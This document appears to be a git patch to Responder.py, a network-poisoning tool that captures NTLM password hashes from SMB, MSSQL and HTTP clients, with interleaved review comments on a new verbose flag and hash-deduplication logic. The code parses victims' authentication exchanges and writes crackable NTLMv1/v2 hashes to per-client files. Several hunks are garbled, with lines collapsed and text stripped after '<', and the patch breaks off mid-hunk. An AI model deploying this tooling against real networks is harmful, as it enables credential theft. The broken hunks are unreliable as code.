From 46b98a616d540ae618198784d0775e687371858e Mon Sep 17 00:00:00 2001
From: lgandx
Date: Wed, 18 Dec 2013 10:51:15 -0500
Subject: [PATCH] added: Command switch -v for verbose mode. Responder is now less verbose.

---
 Responder.py | 156 ++++++++++++++++++++++++++-------------------------
 1 file changed, 80 insertions(+), 76 deletions(-)

diff --git a/Responder.py b/Responder.py
index 2dff36c..715f2a0 100644
--- a/Responder.py
+++ b/Responder.py
@@ -40,6 +40,8 @@ parser.add_option('-w','--wpad', action="store", dest="WPAD_On_Off", help = "Set
 parser.add_option('--lm',action="store", help="Set this to Off if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is Off", metavar="Off",dest="LM_On_Off", choices=['On','ON','Off','OFF'], default="Off")
 
 
+parser.add_option('-v',action="store_true", help="More verbose",dest="Verbose")
+
 options, args = parser.parse_args()
 
 if options.OURIP is None:
@@ -75,6 +77,7 @@ Wredirect = options.Wredirect.upper()
 Basic = options.Basic.upper()
 Finger_On_Off = options.Finger.upper()
 INTERFACE = options.INTERFACE
+Verbose = options.Verbose
 
 if INTERFACE != "Not set":
     BIND_TO_Interface = INTERFACE
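Review bot: The new `-v` option has no `default=`, so with optparse `options.Verbose` is `None` rather than `False` when the flag is absent; the later `if Verbose == True` test tolerates that, but any code that prints or logs the setting will show `None`. Every other option in this parser also has a long form, and this one does not. I would write `parser.add_option('-v','--verbose',action="store_true", help="More verbose",dest="Verbose", default=False)` so the flag reads like its siblings and always holds a boolean.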
@@ -125,19 +128,35 @@ def WriteData(outfile,data, user):
     with open(outfile,"r") as filestr:
         if re.search(user.encode('hex'), filestr.read().encode('hex')):
             filestr.close()
-            return None
+            return False
+        if re.search("\$", user):
+            filestr.close()
+            return False
         else:
             with open(outfile,"a") as outf2:
                 outf2.write(data)
                 outf2.write("\n")
                 outf2.close()
 
+def PrintData(outfile,user):
+    if Verbose == True:
+        return True
+    if os.path.isfile(outfile) == True:
+        with open(outfile,"r") as filestr:
+            if re.search(user, filestr.read()):
+                filestr.close()
+                return False
+            else:
+                return True
+    else:
+        return True
+
 # Break out challenge for the hexidecimally challenged. Also, avoid 2 different challenges by accident.
 Challenge = ""
 for i in range(0,len(NumChal),2):
     Challenge += NumChal[i:i+2].decode("hex")
 
-Show_Help("[+]NBT-NS & LLMNR responder started\n[+]Loading Responder.conf File..\nGlobal Parameters set:\nResponder is bound to this interface:%s\nChallenge set is: %s\nWPAD Proxy Server is:%s\nWPAD script loaded:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\nServing Executable via HTTP&WPAD is:%s\nAlways Serving a Specific File via HTTP&WPAD is:%s\n\n"%(BIND_TO_Interface, NumChal,WPAD_On_Off,WPAD_Script,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off))
+Show_Help("[+]NBT-NS & LLMNR responder started\n[+]Loading Responder.conf File..\nGlobal Parameters set:\nResponder is bound to this interface:%s\nChallenge set is:%s\nWPAD Proxy Server is:%s\nWPAD script loaded:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\nServing Executable via HTTP&WPAD is:%s\nAlways Serving a Specific File via HTTP&WPAD is:%s\n\n"%(BIND_TO_Interface, NumChal,WPAD_On_Off,WPAD_Script,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off))
 
 #Simple NBNS Services.
 W_REDIRECT = "\x41\x41\x00"
@@ -366,7 +385,6 @@ def ParseShare(data):
     a = re.search('(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet)
     if a:
         quote = "Share requested: "+a.group(0)
-        print quote.replace('\x00','')
         logging.warning(quote.replace('\x00',''))
 
 #Parse SMB NTLMSSP v1/v2
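Review bot: `PrintData` hands the captured `user` string to `re.search` as a pattern, whereas `WriteData` hex-encodes both sides precisely to avoid that; the username and domain are taken from the client's packet, so a value containing `(`, `[` or `\` raises `re.error` inside the SMB handler (the `except Exception: raise` in ParseSMBHash passes it up) and `.` or `+` produce false "already seen" matches. A substring test is what is meant here: `if user in filestr.read():`. The new `re.search("\$", user)` guard in `WriteData` also interacts badly with `PrintData`: in the branch shown, a user whose name contains `$` is returned before being written, so `PrintData`, which only consults the file, keeps returning True for that user and its hash is printed on every connection, the opposite of this commit's stated aim; if machine accounts are meant to be skipped, the check belongs in the callers before `PrintData` is consulted. `WriteData`'s opening lines (the not-yet-existing-file case) are outside this hunk, so I cannot tell whether that path applies the same `$` rule.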
@@ -390,37 +408,35 @@ def ParseSMBHash(data,client): NthashOffset = struct.unpack(' 60: - print "[+]SMB-NTLMv2 hash captured from : ",client outfile = "SMB-NTLMv2-Client-"+client+".txt" NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper() DomainLen = struct.unpack(' 25: Hash = data[65+LMhashLen:65+LMhashLen+NthashLen] logging.warning('[+]SMB-NTLMv2 hash captured from :%s'%(client)) - print "[+]SMB-NTLMv2 hash captured from :",client outfile = "SMB-NTLMv2-Client-"+client+".txt" pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2] var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]] Username, Domain = tuple(var) Writehash = Username+"::"+Domain+":"+NumChal+":"+Hash.encode('hex')[:32].upper()+":"+Hash.encode('hex')[32:].upper() - WriteData(outfile,Writehash, Username+"::"+Domain) - print "[+]SMB-NTLMv2 complete hash is :",Writehash + if PrintData(outfile,Username+"::"+Domain): + print "[+]SMB-NTLMv2 hash captured from :",client + print "[+]SMB-NTLMv2 complete hash is :",Writehash + ParseShare(data) + WriteData(outfile,Writehash, Username+"::"+Domain) logging.warning('[+]SMB-NTLMv2 complete hash is :%s'%(Writehash)) - print "Username : ",Username - logging.warning('[+]SMB-NTLMv2 Username:%s'%(Username)) - print "Domain (if joined, if not then computer name) : ",Domain - logging.warning('[+]SMB-NTLMv2 Domain (if joined, if not then computer name) :%s'%(Domain)) if NthashLen == 24: - print "[+]SMB-NTLMv1 hash captured from : ",client logging.warning('[+]SMB-NTLMv1 hash captured from :%s'%(client)) outfile = "SMB-NTLMv1-Client-"+client+".txt" pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2] var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]] Username, Domain = tuple(var) writehash = Username+"::"+Domain+":"+data[65:65+LMhashLen].encode('hex').upper()+":"+data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()+":"+NumChal - 
WriteData(outfile,writehash, Username+"::"+Domain)
-            print "[+]SMB complete hash is :", writehash
+            if PrintData(outfile,Username+"::"+Domain):
+                print "[+]SMB-NTLMv1 hash captured from : ",client
+                print "[+]SMB complete hash is :", writehash
+                ParseShare(data)
+                WriteData(outfile,writehash, Username+"::"+Domain)
             logging.warning('[+]SMB-NTLMv1 complete hash is :%s'%(writehash))
-            print "Username : ",Username
             logging.warning('[+]SMB-NTLMv1 Username:%s'%(Username))
-            print "Domain (if joined, if not then computer name) : ",Domain
             logging.warning('[+]SMB-NTLMv1 Domain (if joined, if not then computer name) :%s'%(Domain))
-            packet = data[:]
-            a = re.search('(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet)
-            if a:
-                quote = "Share requested: "+a.group(0)
-                print quote.replace('\x00','')
-                logging.warning(quote.replace('\x00',''))
     except Exception:
         raise
@@ -522,8 +530,8 @@ class SMB1(BaseRequestHandler):
             data = self.request.recv(4096)
             if data[8:10] == "\x73\x00":
                 if Is_Anonymous(data):
-                    head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))
-                    final = SMBSessEmpty()###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
+                    head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
+                    final = SMBSessEmpty()
                     packet1 = str(head)+str(final)
                     buffer1 = longueur(packet1)+packet1
                     self.request.send(buffer1)
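Review bot: `ParseShare(data)` now appears to sit inside the `if PrintData(...)` block in both the NTLMv2 and NTLMv1 branches (indentation is lost in this copy), which means the share name is recorded only the first time a user/domain is seen per client file, or in verbose mode; before this commit the `Share requested:` line reached the log on every capture. Since `ParseShare`'s own `print` is removed in this same commit, gating the call drops data from the log file rather than just quieting the console, while the neighbouring `logging.warning('[+]SMB-NTLMv1 complete hash ...')` is deliberately left unconditional. I would move `ParseShare(data)` out of the `if` to the same level as that `logging.warning` call in both branches. `ParseSMBHash`'s `def` line precedes this hunk, and the NTLMv2 part of the hunk is garbled where `<` was stripped (`struct.unpack(' 60:`), so it could not be checked line by line.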
@@ -636,44 +644,42 @@ def ParseSQLHash(data,client): LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper() NthashLen = struct.unpack(' 60: - print "[+]MSSQL NTLMv2 Hash captured from :",client - logging.warning('[+]MsSQL NTLMv2 hash captured from :%s'%(client)) DomainLen = struct.unpack(' 24: - print "[+]HTTP NTLMv2 hash captured from :",client - logging.warning('[+]HTTP NTLMv2 hash captured from :%s'%(client)) NthashLen = 64 DomainLen = struct.unpack('